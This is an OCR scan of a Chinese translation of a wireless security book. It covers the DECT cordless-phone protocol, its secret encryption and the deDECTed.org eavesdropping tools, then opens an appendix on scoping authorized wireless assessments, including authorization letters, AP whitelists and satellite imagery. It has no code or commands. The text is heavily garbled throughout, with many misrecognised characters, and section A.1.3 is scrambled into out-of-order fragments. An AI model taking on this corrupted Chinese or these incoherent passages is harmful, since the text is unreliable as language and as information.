在 本 章 中 ， 我 们 会 讲解 DECT 青 后 隐藏 的 技术 ， 包 括 协 议 的 特性 和 细节 。 同 样 我 们 会 进 解 实际 攻击 DECT 的 万 法 ， 攻 击 者 能 
够 使 用 这 些 方 法 穷 听 语音 和 数据 通信 交换， 或 者 对 这 项 无 线 技 术 进 行 伪造 。 


12.1 _DECT 简 介 


DECT 标 准 由 欧洲 电信 化 标准 协会 (European Telecommunications Standards Institute，ETSI) 开发 ， 作 为 一 项 无 线 协 
议 ， 它 能 够 在 欧洲 、 中 东 以 及 非洲 (Europe，the Middle East，and Africa，EMEA) 之 间 传 输 语音 和 低速 率 数 据 。DECT 最 
初 广泛 应 用 于 欧洲 ， 用 来 进行 语音 和 数据 传输 ， 之 后 它 演变 成 了 家 庭 和 企业 无 线 电话 的 全 球 标准 。 


DECT 的 设计 标准 使 它 能 够 应 用 于 短程 和 远程 的 无 线 电话 中 ， 满 足 家 庭 无 线 电话 和 专用 自动 交换 分 机 (Private Automatic 
Branch Exchange，PABX) 市 场 的 需求 ，PABX 在 楼 宇和 校园 内 可 以 提供 无 线 访问 。 此 外 DECT 技 术 在 欧洲 的 住宅 和 小 型 办 公 室 
市 场 中 也 获得 巨大 的 成 功 ， 在 北美 它 也 越 来 越 广泛 地 应 用 于 短程 无 线 电 话 技术 中 。 作 为 一 项 标准 化 的 技术 ，DECT 超 过 了 现 有 的 
其 他 短程 无 线 电 话 技 术 ， 它 采用 单独 分 配给 DECT 的 频谱 ， 从 而 免 于 受到 工业 、 科 学、 医学 (Industrial,，Science, and 
Medical，ISM) 频段 的 干扰 。 


消费 者 也 能 够 得 益 于 DECT 的 标准 化 结构 ， 因 为 产品 之 间 都 有 很 好 的 兼容 性 。 消 费 者 可 以 选择 一 个 符合 需求 的 DECT 基 站 设 
备 ， 然 后 再 选择 其 他 厂商 的 手持 设备 。 如 果 消 费 者 需要 另外 购买 一 个 手持 设备 用 于 家 庭 或 者 企业 中 ， 他 可 以 从 任何 支持 DECT 标 


准 的 厂商 那里 购买 到 它 ， 同 时 它 与 已 有 的 基站 设备 还 能 保持 互相 兼容 。 


DECT 规 范 定义 一 个 DECT 网 络 由 单个 DECT 基 站 ， 称 为 固定 装置 (Fixed Part，FP) ， 以 及 一 个 或 者 多 个 移动 设备 ， 称 为 移 
动 委 置 (Portable Part，PP) 。 在 大 部 分 的 PECT 网 络 中 ， 固 定 凌 置 通 单 都 是 移动 电话 的 底座 部 分 ， 它 连接 到 公共 交换 电话 网 
(Public Switched Telephone Networks，PSTN) 或 者 其 他 IP 服 务 上 ， 在 DECT 网 络 中 提供 上 行 的 服务 访问 ， 如 右 图 所 示 。 每 
个 移动 电话 设备 都 代表 了 DECT 网 络 中 的 一 个 移动 装置 。 


EW 


12.2 DECT 安 全 


DECT 协 议 提供 设备 认证 和 加 密 算法 来 防止 未 经 授权 的 访问 ， 确 保 语音 和 数据 的 私密 性 。 这 些 协议 都 是 DECT 标 准 的 一 部 
分 ， 但 是 它们 却 没有 公开 发 布 。 在 保证 不 泄露 的 前 提 下 ，ETSI 将 这 些 算法 规范 公布 给 了 DECT 设 备 制造 商 ， 所 以 普通 的 用 户 无 法 
获取 到 它们 。 


不 公开 即 安全 的 星 端 


为 了 保护 DECT 技 术 的 安全 ， 在 保证 不 泄露 的 前 提 下 ，ETSI 将 DECT 的 安全 算法 规范 公布 给 了 设备 制造 商 和 开发 商 。ETSI 认 
为 通过 限制 了 解 技术 实现 细节 的 人 的 数量 ， 无 形 中 就 增加 了 DECT 标 准 的 安全 ， 进 一 步 来 说 ， 由 于 事先 签署 了 保密 协议 ， 因 此 这 
就 防止 了 他 们 公开 讨论 这 些 技术 。 


ETSI 使 用 的 策略 是 “不 公开 即 安 全 ” 。 对 于 任何 协议 ， 实 现 安 全 的 唯一 方法 是 接受 同行 的 审查 和 审议 。 对 于 DECT 来 说 ， 能 
够 审查 协议 安全 性 的 只 有 那些 从 技术 中 获取 经 济 利益 的 人 。 在 这 种 情况 下 ， 并 不 能 保证 技术 的 安全 性 ， 因 为 对 于 DECT 技 术 的 优 
点 和 弱点 并 没有 被 公正 地 评估 过 。 


在 本 章 中 ， 你 会 看 到 DECT 加 密 算法 的 安全 性 存在 着 巨大 的 缺陷 ， 这 就 给 了 攻击 者 利用 系统 漏洞 的 机 会 。 由 于 协议 缺少 预先 
的 安全 评估 审议 ， 而 DECT 的 应 用 又 是 如 此 的 广泛 ， 因 此 最 终 导 致 了 许多 用 户 都 面临 着 窃听 攻击 和 其 他 私密 性 攻击 的 威胁 。 很 明 
显 ，ETSI 应 该 为 这 样 一 种 局 面 承担 责任 ， 因 为 他 们 决定 不 公开 发 布 这 项 标准 。 


12.3 ”DECT 攻 击 


自从 1992 年 问世 以 后 ，DECT 技 术 的 应 用 越 来 越 广泛 。 由 于 DECT 安 全 机 制 的 保密 性 以 及 缺少 稳定 的 DECT 窃 听 器 ， 在 2008 
年 年 末 deDECTed.org 项 目 诞生 之 前 ， 很 少 有 攻击 方法 被 公布 于 从 。DeDECTed.ory 项 目 由 众多 志愿 者 组 成 ， 他 们 在 对 硬件 进行 
逆 疝 工程 上 获得 了 成 功 ， 并 且 开 上 友 了 一 个 Linux 驱 动 程序 用 来 穷 听 DECT 网 络 。 


通过 硬件 和 驱动 程序 的 组 合 ，deDECTed.org 的 开发 者 编写 了 一 组 DECT 攻 击 工具 ， 同 样 由 此 衍生 出 了 其 他 攻击 DECT 的 方 
法 。 


12.4 ”本 音 小 结 


DECT 协 议 是 一 个 标准 化 的 无 线 瓜 术 ， 它 能 够 进行 语音 和 数据 通信 ， 广 泛 应 用 于 家 庭 和 小 型 企业 中 。 在 欧洲 、 中 东 以 及 非洲 
中 ， 它 使 用 1.88~1.9GHz 波 段 ， 在 北美 使 用 1.92~1.93GHz 波 段 ，DECT 技 术 拥 有 许多 的 用 户 ， 它 是 一 项 很 有 吸引 力 的 无 线 电 话 
技术 。 

DECT 规 范 由 欧洲 电信 化 标准 协会 (European Telecommunications Standards Institute，ETSI) 发 布 ， 但 是 它 的 安全 细 
节 并 没有 公开 。DECT 标 准 认证 算法 和 DECT 标 准 密码 算法 并 没有 对 外 公开 ， 只 有 签署 过 保密 协议 的 开发 商 和 设备 制造 两 才 能 获 
取 它 们 。 因 此 ， 普 通 的 用 户 束 无 法 对 DECT 的 安全 机 制 进行 分 析 ， 和 直到 2008 年 它 被 人 成 功 地 逆向 ， 揭 露 了 协议 中 多 个 严重 的 安全 
漏洞 ， 同 时 证 明了 这 项 全 球 化 协议 采用 “不 公开 即 安全 ”措施 的 失败 。 


deDECTed.org 项 目 友 布 了 实用 的 工具 来 利用 DECT 规 学 中 的 漏洞 。 配 合 文 持 DECT 的 硬件 ， 攻 击 者 能 够 使 用 deDECTed.org 


的 工具 获取 DECT 了 网 络 中 的 通信 数据 包 ， 最 终 对 未 加 密 的 语音 会 话 进行 穷 听 。 


附录 A 无 线 评 售 中 的 泄 围 确定 和 信息 收集 


本 附录 的 目的 是 向 读者 提供 我 们 多 年 来 所 获得 的 知识 和 经 验 ， 主 要 包括 : 如 何 确 定 正确 的 评估 范围 ， 估 计 努 力 的 程度 ， 并 规 
划 无 线 目标 的 评估 。 为 了 使 本 书 更 具有 实用 性 和 易 用 性 ， 本 附录 叶 在 帮助 需要 完成 无 线 评估 工作 的 读者 。 


A.1 预 评估 


任何 成 功 的 评估 ， 其 基石 是 正确 的 预 评估 规划 。 预 评估 指 的 是 收集 尽 可 能 多 的 数据 ， 以 便 可 以 设置 自己 和 客户 之 间 的 适当 的 
期 望 ; 或 者 如 果 将 完成 无 线 评估 作为 你 为 一 家 公司 工作 的 一 部 分 ， 那 么 束 需 要 设置 你 自己 和 项 目 利益 相关 者 之 间 的 共同 期 望 学 
围 。 


A.1.1 划 定 范围 


当 泡 围 超出 了 无 线 评估 ， 有 几 个 重要 的 因素 需要 考虑 。 除 了 你 要 实地 完成 的 活动 (这些 活动 是 由 项 目 章程 或 工作 中 的 声明 所 
定义 的 ) ， 也 需要 评估 将 花 在 无 线 评估 过 程 中 所 需要 付出 的 努力 。 


场地 大 小 


场地 的 大 小 是 现场 审查 中 一 个 经 常 被 误解 的 方面 。 当 你 评估 远程 站 点 时 ， 很 有 必要 事先 了 解 那里 的 情况 ， 以 便 正 确 估计 到 一 
旦 身 处 那里 ， 需 要 多 少时 间 和 精力 。 无 线 评估 人 员 几 了 乎 不 能 对 一 个 远 端 不 明确 的 地 方 完成 他 们 评估 的 职责 。 从 现场 工作 人 员 那 里 
了 解 情况 也 需要 时 | 间 ， 这 会 最 终 使 他 们 远离 正常 的 职责 。 因 此 ， 预 评估 可 以 确定 站 点 的 规模 大 小 ， 评 估 设 施 里 无 线 设 备 的 个 数 ， 
这 会 达成 适当 的 期 望 ， 该 期 望 是 看 有 多 少时 间 和 精力 ， 这 将 成 为 你 和 其 他 人 在 这 个 约定 上 所 能 提供 的 支持 力度 。 


场地 的 大 小 可 以 通过 英尺 面积 、 无 线 设备 的 数量 ,或 者 两 者 兼 有 的 方式 计算 出 来 。 一 个 大 的 、 空 旷 的 机 场 吊 架 ， 可 能 只 需要 
几 分 钟 就 能 完成 一 个 全 面 漫游 和 评估 ， 反 之 ， 一 个 有 许多 无 线 设 备 和 人 员 的 小 办 公 室 可 能 要 花费 数 个 小 时 ， 因 为 需要 配合 许多 个 
人 的 时 间 表 。 对 于 一 个 有 许多 无 线 接 入 点 的 真正 大 面积 区 域 ， 例 如 一 个 拥有 大 量 小 隔 间 的 和 一 个 己 大 的 无 线 基础 设施 的 、20 层 
元 整 的 企业 办 公 楼 ， 对 其 评估 可 能 需要 花 数 天 的 时 间 。 不 同 的 地 点 需要 不 同 的 评估 方法 。 空 旷 机 场 刷 染 需 要 一 个 快速 的 漫游 ， 各 
种 无 线 设备 的 位 置 的 确定 要 容易 得 多 ， 因 为 你 有 出 色 的 瞄准 线 可 以 完成 所 有 的 定位 。 有 许多 房间 和 走廊 的 大 型 办 公 室 肯 定 会 需 
一 个 较 长 的 漫游 时 间 ， 因 为 无 线 信号 会 因 遇 到 障碍 物 而 产生 衰减 ， 不 可 能 都 位 于 无 线 AP 的 直线 访问 中 。 


站 点 的 位 置 与 距离 


当 估 计 完 成 无 线 评估 所 需要 的 场地 大 小 后 ， 站 点 的 位 置 与 距离 是 一 个 重要 因素 。 特 别 是 ， 如 果 你 打算 在 一 天 内 访问 多 个 站 点 
甚至 是 一 个 接 一 个 退 历 式 地 访问 ， 站 点 位 置 的 影响 将 不 仪 仅 是 旅行 时 间 和 费用 问题 ， 所 有 的 环境 因素 都 可 能 会 影响 到 评估 。 通 过 
我 们 的 评估 ， 我 们 坚信 有 许多 外 在 因素 影响 评估 工作 ， 这 些 因素 不 仪 包括 到 站 点 的 时 间 ， 还 包括 当 到 达 站 点 后 要 完成 的 活动 。 


在 站 点 之 间 的 旅行 时 间 会 超过 一 天 。 必 须 考虑 到 不 同 站 点 之 间 的 时 间 ， 这 可 能 涉及 各 种 交通 形式 。 是 驾驶 交通 工具 从 站 后 到 
站 操 ， 还 是 来 往 穿 梭 于 各 办 公 室 呢 ?需要 利用 公共 交通 工具 ， 如 火车 和 公共 汽车 ， 还 是 步行 束 够 了 ? 如 果 评 估 活 动 是 “战争 各 
驶 ”或 者 一 些 别 的 无 线 侦 测 方 式 ， 能 够 使 用 交通 工具 快速 地 从 一 个 站 点 到 下 一 个 站 点 吗 ? 


除了 站 点 之 间 的 距离 ， 天 气 也 是 一 个 重要 因素 。 通 过 我 们 的 旅行 ， 我 们 学 到 了 并 非 所 有 的 评估 将 发 生 在 田园 诗 般 的 、 阳 光明 
媚 的 日 子 里 。 有 的 时 候 ， 天 气 起 着 非常 重要 的 作用 ， 人 不 仅 在 行驶 到 远 尊 站 点 的 途中 ， 而 且 还 包含 在 站 点 进行 评估 的 活动 中 。 你 计 
划 飞 入 的 机 场 可 能 正 处 在 死 我 冬天 的 大 雪 中 ， 恶 务 的 天 气 可 能 会 天 闭 道 路 和 停止 列车 交通 。 天 气 也 会 影响 站 后 上 的 其 他 人 和 你 计 
划 要 完成 的 活动 。 


位 置 也 意味 着 要 考虑 你 的 周围 环境 。 如 果 该 站 点 处 在 “前 不 着 村 ， 后 不 着 店 ”的 地 方 ， 周 围 人 口 稀 玖 ， 那 么 在 做 评估 活动 的 
过 程 中 ， 你 也 不 太 可 能 遇 到 邻居 家 的 无 线 网 络 。 当 然 ， 因 为 可 以 集中 你 的 注意 力 来 关注 客 尸 端的 无 线 基础 设施 ， 而 不 必 过 多 考虑 
其 他 的 无 线 网 络 ， 从 这 一 点 上 来 看 ， 这 也 是 很 理想 的 了 。 然 而 ， 即 使 该 网 站 只 是 一 个 单 层 建筑 物 中 的 一 个 小 型 办 公 室 ， 客 己 端 可 
能 位 于 整个 企业 园区 的 中 间 ， 友 现 邻 近 的 无 线 接 入 点 的 机 会 大 得 多 。 通 过 许多 无 线 AP 需 要 更 多 的 努力 进行 筛选 ， 然 后 找到 你 感 
兴趣 的 那 一 个 。 


位 置 也 可 以 指 当 在 站 点 运行 的 时 候 ， 关 注 其 他 环境 问题 。 前 往 其 他 国家 进行 无 线 评估 可 能 需要 特殊 的 签证 ， 而 如 果 在 国内 进 
行 评 佑 工作 ， 会 因为 对 无 线 电 和 频率 和 人 允许 工具 的 使 用 ， 当 地 有 关 的 地 方 性 法 规 会 有 很 多 实 实 在 在 的 麻烦 来 阻止 你 完成 无 绪 活 动 。 
我 们 甚至 没有 考虑 过 市 着 众多 无 线 设 备 行驶 通过 不 同 的 机 场 ， 从 而 让 一 和 群 市 着 所 有 的 天 线 和 笔记 本 电脑 的 人 吸引 机 场 安检 人员 的 
注意 。 不 同 的 国家 可 能 也 将 面临 着 各 种 形式 的 政治 动 泛 ， 因 而 在 这 样 的 国家 时 可 能 需要 政府 官员 或 警察 护送 。 


以 往 的 评估 


将 以 前 所 做 的 工作 不 打折 地 作为 一 个 有 价值 的 信息 源 ， 作 为 未 来 评估 的 参考 。 在 以 往 的 评估 中 所 收集 的 信息 将 作为 一 个 关键 
指标 ， 访 指标 告诉 我 们 什么 将 希望 用 于 将 来 约定 中 。 有 价值 的 信息 可 以 包括 : 在 以 前 的 评估 中 ， 已 查 明 的 无 线 接 入 后 的 数量 ,在 
过 去 已 确定 的 安全 关注 点 ， 包 括 该 公司 已 做 出 回应 的 那些 等 其 他 内 容 。 从 以 前 的 工作 收集 尽 可 能 多 的 信息 也 是 很 有 用 的 ， 这 样 束 
不 会 有 不 必要 的 重复 秀 动 。 


A.1.2 无 线 评估 需要 市 的 物品 


当 完 成 在 现场 的 无 绪 评 佑 约定 后 ， 评 信和 人 员 让 别人 看 到 的 不 应 该 是 只 有 一 辆 妆 满 天 线 和 笔记 本 电脑 的 和 车。 事实 上 ， 要 做 的 事 
情 (特别 是 暗访 ) 往往 会 遇 到 麻烦 。 你 会 看 起 来 很 可 疑 ， 甚 至 会 因为 一 次 与 执法 人 员 的 交谈 而 被 拘留 。 所 以 ， 在 去 现场 之 前 ， 要 
考虑 先 市 上 以 下 各 项 物品 。 


批准 六 


这 基本 上 是 你 的 “走出 监狱 获得 目 由 ” 卡 。 如 果 在 评估 的 活动 中 被 叫 停 ， 这 是 你 要 展示 给 安全 人 员 或 其 他 人 员 的 信息 。 典 型 
的 网 络 安全 评估 操作 涉及 将 一 个 设施 加 入 到 一 个 有 线 网 络 ， 或 者 通过 公开 访问 的 网 络 进行 远程 工作 。 然 而 ， 无 线 评估 工作 要 求 评 
估 人 员 身 处 被 评估 的 网 络 中 或 在 站 点 附近 。 在 无 线 漫 游 的 情况 下 ， 网 络 安全 评估 人 员 后 面 拖 着 无 线 器 材 被 陪同 通过 该 区 域 ， 安 全 


级 别 将 变 成 一 个 低 得 多 问题 。 


但 是 ， 如 果 工 作 要 求 使 用 “战争 各 驶 ”或 者 “战争 行走 ” (详细 介绍 参见 第 6 草 ) 方式 ， 在 后 面 拖 着 一 根 天 线 和 笔记 本 围绕 
设施 的 周边 步行 或 驾驶 ， 很 可 能 被 认为 是 可 疑 的 活动 ， 你 将 可 能 会 被 叫 停 ， 并 要 求解 释 你 的 行为 。 


对 所 有 这 一 切 ， 显 而 易 见 的 解决 办 法 是 通知 与 设施 相关 的 各 方 ， 你 将 要 在 站 点 进行 评估 。 正 如 我 们 已 经 与 一 些 部 门 事先 约定 
的 一 样 ， 有 些 客户 会 将 无 线 评 估 作 为 一 次 掉 机 ， 借 以 测试 他 们 的 保安 人 员 的 有 效 性 。 当 有 人 在 停车 场 暗访 ， 然 后 在 笔记 本 电脑 上 
输入 些 什 么 东西 时 ， 当 地 工作 人 员 会 如 何 反 应 ? 他 们 注意 到 街 对 面 有 人 在 用 设备 指向 他 们 这 里 吗 ? 这 些 都 是 客户 在 你 操作 的 过 程 
中 要 你 回答 的 ， 可 能 没 人 告诉 你 天 于 评估 的 这 些 方面 。 如 果 是 这 样 的 情况 下 ， 如 果 保 安 人 员 很 负责 ， 那 么 他 们 融会 阻止 你 当前 的 
工作 ， 并 要 求 你 回答 他 们 的 问题 ， 或 者 打 电 话 到 地 万 当 局 。 准 备 并 市 好 批准 阔 可 以 解释 这 是 垮 么 回 事 。 


批准 函 本 身 应 该 包 合 以 下 信息 : 


联系 信息 ”这些 都 是 在 你 万 一 被 拘留 的 时 候 ， 安 全 人 员 或 警察 应 该 联系 的 人 。 联 系 方式 应 包括 你 为 其 所 工作 的 本 地 站 点 的 
代表 ， 以 及 你 的 经 理 或 项 目 负责 人 。 联 系 方式 应 包括 一 个 在 组 织 中 有 适当 权威 级 别 的 副 总 裁 或 别 的 什么 人 ， 该 人 知道 评估 事情 的 
来 龙 去 脉 。 所 有 的 联系 人 包括 姓名 、 电 话 号 码 、E-mail 地 址 ， 以 及 其 他 与 项 目 相关 的 东西 。 此 外 ， 如 果 可 能 的 话 ， 还 应 增加 一 个 
第 二 联系 人 以 防 万 一 第 一 联系 人 正好 联系 不 上 。 


-工作 的 本 质 襄 明 这 是 一 个 对 你 所 做 的 所 有 事情 和 原因 的 解释 。 如 果 你 是 一 个 第 三 方 的 评估 员 ， 这 将 来 自 于 你 的 工作 声 
明 。 如 果 你 是 一 个 公司 内 部 的 无 线 评 估 员 ， 这 些 信 息 应 该 来 自 你 的 项 目 章程 。 内 容 应 尽 可 能 详细 ， 但 记 住 : 阅读 你 批准 信 的 人 本 


身 可 能 不 是 无 线 评审 员 ， 因 此 ， 请 确保 非 技术 性 的 人 员 也 可 以 理解 这 份 文 档 。 


最 好 ， 这 封 信 应 该 在 官方 公司 信和 丑 之 处 有 真实 的 内 容 。 如 果 你 是 一 个 公司 的 和 雇员， 确保 访 处 有 你 的 员工 识别 标志 。 如 果 你 是 
一 个 承包 商 ， 拿 出 你 的 商业 名 片 说 明 你 的 名 字 或 你 为 谁 而 工作 。 在 一 个 实际 项 目 案例 中 ， 我 们 到 达 疯 位 开始 为 一 个 公司 执行 一 项 
无 线 安 全 评估 工作 ， 然 而 ， 我 们 是 作为 分 包 商 通过 另 一 方 进行 工作 的 。 我 们 除了 一 封 批准 信之 外 ， 没 有 证 据 可 以 证 明 我 们 与 客户 
方 有 任何 关系 ， 批 准 信和 b 合 非 钊 详细 的 联络 资料 ， 这 可 以 使 客户 的 安全 团队 可 以 很 快 地 证 实 我 们 所 讲 的 事情 ， 当 通过 联络 资料 核 
实 信息 后 ， 我 们 才 被 允许 进入 该 设施 中 执行 任务 。 

记 住 要 把 你 的 批准 为 放 在 一 个 保险 的 地 万 ， 否 则 当 被 对 方 的 工作 人 员 盘 问 的 时 候 ， 目 己 再 手忙脚乱 地 在 类 似 的 证 明文 件 中 翻 
来 找 去 ， 没 有 比 这 更 姑 坎 的 事 了 吧 。 


无 线 接 入 点 的 日 名 单 


当 所 做 的 无 线 评 估 处 于 与 邻 国 和 其 他 企业 附近 地 区 的 时 候 ， 这 个 列表 就 显得 尤为 重要 。 无 线 AP 的 日 名 单 使 你 知道 哪个 无 线 
接 入 点 是 目标 接 入 点 ， 哪 些 不 是 。 在 未 获得 事先 批准 的 情 ; 品 下， 对 别人 的 无 线 接 入 点 采用 无 线 注 入 式 测 试 是 不 道德 的 ， 且 是 非法 
的 。 获 得 这 一 信息 应 在 预 评估 的 沁 围 内 协商 (在 将 在 随后 讨论 ) ， 并 应 封装 在 工作 或 项 目 计划 的 声明 中 。 你 所 需要 的 基本 信息 包 
括 : 


. SSID 名 称 
- MAC 地 址 

无 线 接 入 设备 的 制造 商 
: AP 的 IP 地 址 

信道 (可 选 ) 

“IP 范围 (可 选 ) 


当 查 找 骗 子 的 无 线 接 入 点 时 ， 情 况 就 变 得 复杂 了 。 一 个 客户 可 以 给 你 一 个 他 们 绝对 知道 设备 存在 的 接 入 点 日 名 单 ， 但 你 的 首 
要 任务 是 上 友 现 一 个 雇员 或 一 些 亚 意 的 个 人 已 经 安 半 了 的 AP。 困 难 在 于 确定 你 所 找到 的 任何 “ 非 日 名 单 ”无 线 信号 是 公司 网 络 上 
的 恶意 接 入 点 ， 还 仅仅 是 一 个 从 相 邻 的 企业 中 透 墙 而 过 的 无 线 信 号 。 在 这 里 ， 你 的 位 置 意识 非 单 重 要 。 如 果 你 人 在 站 点 工作 的 时 
候 ， 周 围 什么 都 没有 ， 你 所 友 现 的 不 在 日 名 单 上 的 AP 很 可 能 束 是 一 个 骗子 接 入 上 后， 反之， 如 果 该 设施 被 其 他 拥有 目 己 的 无 线 接 
入 所 的 企业 所 包围 ， 针 对 无 线 信 号 是 不 是 从 隔壁 友 映 出 来 的 ， 或 者 是 从 设施 里 边 产 生 ， 玖 将 变 得 难以 区 分 。 


安全 排查 和 安全 的 设备 


并 不 是 每 个 站 后 都 很 容易 到 达 ， 或 者 到 达 时 很 容易 进入 系统 中 。 在 我 们 前 面 提 到 的 情况 下 ， 虽 然 客 尸 已 对 你 所 携带 的 设备 ， 


在 安全 方面 做 了 充分 的 检查 ， 但 仍然 有 可 能 因为 没有 正式 的 排查 或 者 安全 设备 证 明文 件 ， 而 导致 你 在 门口 被 拒绝 入 内 。 对 此 很 显 
而 易 见 的 解决 方案 束 是 将 一 切 你 需要 的 东西 市 在 身上 。 请 问 你 需要 一 个 刷卡 或 其 他 形式 的 官方 鉴定 书 吗 ? 请 问 你 需要 实际 的 政府 
批准 的 安全 检查 吗 ? 你 需要 像 安全 幅 和 护 目 镜 的 东西 吗 ? 获得 这 些 东 西 需 要 多 久 ? 在 到 达 客 尸 尊 现场 之 前 请 一 定 要 考虑 所 有 这 些 


情景 。 

A.1.3 ”开展 沁 围 协商 

汽 围 协商 是 预 评估 活动 中 最 关键 的 一 步 。 在 协商 中 ， 评 估 人 员 定 义 在 现场 他 会 做 什么 ， 并 收集 尽 可 能 多 的 站 点 信息 。 在 开展 
汽 围 协商 万 面 没 有 正确 或 错误 的 方式 。 以 下 是 完成 一 个 成 功 的 无 线 评估 所 必须 收集 的 关键 信息 : 


必需 的 。 你 不 能 连 位 置 都 不 知道 而 评估 一 个 站 点 。 


: 站 点 地 址 /位 置 
言 息 。 


型 的 接 入 上 点， 已 知 


AP 、 
. 站 点 的 联系 方式 ” 当 你 到 达 站 点 时 ， 谁 是 你 的 联系 人 ? 一 般 是 站 点 的 经 理 在 你 到 达 时 将 你 引见 的 人 ， 或 IT 成 员 ， 或 安全 工 
: 设施 规模 和 目的 ”要 去 的 地 方 有 多 大 的 面积 ? 它 是 一 个 小 型 办 公 室 还 是 大 型 配送 中 心 ? 要 访问 公司 总 部 20 层 大 厦 吗 ? 在 本 
合 。 我 们 曾 遇 见 过 站 


作 人 员 ,， 但 他 同意 陪同 你 ? 除了 名 字 、 电 话 号 码 、 电 子 邮 件 地 址 ， 以 及 如 果 第 一 联系 人 的 联系 方式 不 能 用 时 的 第 二 联系 人 的 联系 


有 
附录 的 后 面 ， 我 们 将 讨论 在 该 范围 的 问卷 不 足 或 需要 外 部 确认 的 时 候 ， 如 何 通 过 其 他 方式 ， 获 得 这 些 人 
言 息 ， 包 括 那 里 应 该 使 用 的 是 什么 
么 样 的 ， 但 这 可 能 与 现实 不 符 
为 采用 隐藏 方式 而 躲 过 主动 扫描 器 的 无 线 接 入 点 。 


. 有 天 目标 的 技术 信息 ”就 是 对 于 当前 的 无 线 基础 设施 ， 从 哪里 收集 人 
接 入 点 的 白 名 单 等， 这 些 信息 仅仅 告诉 了 你 客户 认为 的 无 线 基础 设施 应 该 是 什 
点 合同 中 说 在 该 设施 中 没有 无 线 接 入 点 ， 但 是 当 我 们 到 达 时 ， 发 现 事实 上 有 因 
准确 确定 将 执行 什么 样 的 行动 ”不 要 以 为 无 线 评估 只 是 发 现 恶意 的 无 线 接 入 点 ， 然 后 带 着 高 增益 天 线 坐 在 街 的 对 面试 图 破 
法 。 另 一 方面 ， 如 果 你 在 评估 过 程 中 拥有 全 权 处 理 能 力 ， 那 么 详细 解释 什么 行动 必须 完成 ， 并 在 他 们 到 达 之 
尔 获 得 的 任何 方式 尝试 进一步 渗透 到 网 络 
注意 到 这 些 数 据 。 


透 测 试 ， 或 者 使 用 了 1 


A 六 AN 


三 于 
有 
密 算 


吗 ? 设备 有 奇怪 的 工 


~ 也 /一 


前 同意 。 
只 是 简单 地 执行 一 个 无 线 接 入 点 的 渗 i 
能 利用 这 次 访问 获得 更 多 的 活动 ， 或 者 你 只 能 
站 点 是 否 有 任何 像 “ 警 卫 看 门 ” 和 “访问 路 径 一样 特殊 的 访问 功能 吗 ? 需要 特别 的 安排 “和 ”设备 来 到 达 现 
通行 


解 薄弱 的 无 线 加 
万 一 悲剧 了 怎么 办 
中 ? 同意 一 个 成 功 的 注入 攻击 该 如 何 被 使 用 ， 无 论 是 否 能 利 


“ 其 他 信和 已 
场 ， 如 徽章 、 钥 匙 卡 、 安 全 设备 等 吗 ? 你 在 一 年 的 某 个 时 刻 到 达 ， 可 那 时 道路 上 被 冰 鹤 盖 着 ， 或 者 无 法 


言 息 3 
作 时 上段 吗 ? 本 地 站 点 联系 的 任何 事情 都 可 以 告诉 你 关于 位 置 和 周围 环境 是 非常 有 用 的 。 
许多 诸如 此 类 的 问题 应 在 工作 的 声明 或 者 项 目 章程 中 做 出 回答 ， 但 沁 围 协商 的 过 程 就 是 在 你 到 达 了 生 站 点 之 前 了 解 这 些 事情 


/ 


的 最 好 机 会 。 
A.1.4 ”通过 卫星 图 像 收 集 信 息 
如 果 不 能 从 范围 协商 中 获得 足够 的 信息 ， 对 于 站 点 的 大 小 和 位 置 ， 收 集 信息 的 最 佳 替代 品 (或 补充 ) 之 一 就 是 在 线 地 图 和 卫 
星 图 像 。 谷 歌 地 图 (Google Maps) 和 其 他 因特网 地 图 网 站 发 布 之 前 ， 旅 行 和 过 境 的 时 间 可 能 通过 询问 在 现场 的 人 员 来 计算 
或 者 基于 找到 该 地 区 的 印刷 地 图 进行 估计 。 唯 一 决定 大 小 的 方式 就 是 通过 预 评估 的 协商 。 
现在 ， 通 过 卫星 图 像 来 确定 场地 大 小 、 位 置 ， 甚 至 是 密度 要 容易 得 多 。 例 如 ， 获 取 位 于 佐治 亚 州 亚特兰大 市 的 McGraw-Hil 
办 公 室 的 卫星 图 像 (如 图 A-1) 。 这 张 照片 是 从 谷歌 地 图 (http://maps.google.com) 上 获得 的 [1 


er ( gle [MADS 4170 Ashford-Dunwoody Road Suite 200 Atlanta, GA 30319 | Search Maps | 


| 到 对 | 


图 A-1 从 谷歌 地 图 上 获得 的 位 于 佐治 亚 州 亚特兰大 市 的 McGraw-Hill 办 公 室 


从 这 张 图 片上 ， 可 以 推断 出 很 多 。 我 们 可 以 看 到 ， 在 设施 周围 没有 多 少 邻 居 ， 所 以 看 到 其 他 无 线 接 入 点 的 可 能 性 是 比较 小 
的 。 从 任何 相 邻 的 无 线 设 备 发 出 的 信号 将 最 有 可 能 达 不 到 的 McGraw-Hill 的 办 公 室 。McGraw-Hill 的 设施 也 被 树林 所 包围 ， 所 以 
邻居 的 无 线 设 备 检测 的 可 能 性 则 更 低 。 


我 们 可 以 判断 该 设施 的 大 约 尺寸 。 利 用 谷歌 地 图 的 图 例 工具 站， 我 们 可 以 确定 出 建筑 大 约 200 英 尺 x200 英 尺 ， 没 有 相 邻 或 
附属 的 办 公 辅 楼 。 


我 们 也 可 以 猜测 站 点 的 一 般 人 口 密 度 。 停 车 场 是 一 个 确定 有 多 少 人 在 该 地 点 工作 的 绝 好 方式 。 目 前 ， 在 可 以 容纳 100 多 辆 车 
位 的 停车 场 上 停 有 大 约 100 辆 车 。 除 非 很 多 人 拼车 ， 否 则 可 以 假设 在 该 站 点 工作 的 詹 员 每 人 一 辆 和 车。 有时， 人 在 员工 数量 和 无 线 覆 
盖 的 数量 上 存在 相关 性 ， 因 为 有 足够 的 无 线 设 备 服 务 于 站 点 的 所 有 成 员 才 有 意义 。 然 而 ， 根 据 无 线 部 署 的 目的 ， 有 可 能 在 二 者 之 
间 根 本 殊 没 有 相关 性 。 也 许 无 线 设 备 只 部 署 在 会 议 室 和 大 堂 等 处 提供 给 等 候 的 客人 使 用 的 。 


自 顶 向 下 拍摄 的 卫星 图 像 并 不 总 是 能 作为 评估 人 员 判 断 一 个 站 点 有 多 大 的 最 好 方式 ， 很 难 判断 该 站 点 的 楼 层 是 一 层 ， 还 是 
20 层 。 有 的 在 线 地 图 网 站 有 能 力 从 3/4 倾 角 的 角度 看 图 ， 所 以 你 可 以 看 到 大 楼 有 多 高 。Microsoft 公 司 的 Bing 地 图 搜索 网 站 
(http://www.bing.com/maps/) 拥有 这 种 称 为 “ 乌 隔 ”的 功能 ， 通 过 这 一 视角 ( 见 图 A-2) ， 我 们 可 以 看 到 : McGraw-Hil 
